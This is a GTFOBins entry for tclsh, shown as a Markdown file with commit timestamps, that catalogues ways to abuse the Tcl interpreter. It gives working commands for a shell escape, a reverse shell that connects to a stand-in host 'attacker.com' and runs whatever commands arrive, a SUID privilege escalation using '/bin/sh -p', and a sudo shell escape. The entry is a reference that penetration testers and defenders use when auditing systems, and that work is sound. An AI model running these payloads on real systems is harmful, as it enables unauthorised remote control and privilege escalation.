GTFOBins.github.io/_gtfobins/tclsh.md

22 lines
682 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-07-16 15:01:50 +02:00
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
2018-10-05 19:55:38 +02:00
non-interactive-reverse-shell:
2018-07-16 15:01:50 +02:00
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
2018-10-05 19:55:38 +02:00
suid:
2018-07-16 15:01:50 +02:00
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
2018-10-05 19:55:38 +02:00
sudo:
2018-07-16 15:01:50 +02:00
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
2018-05-25 01:10:39 +02:00
---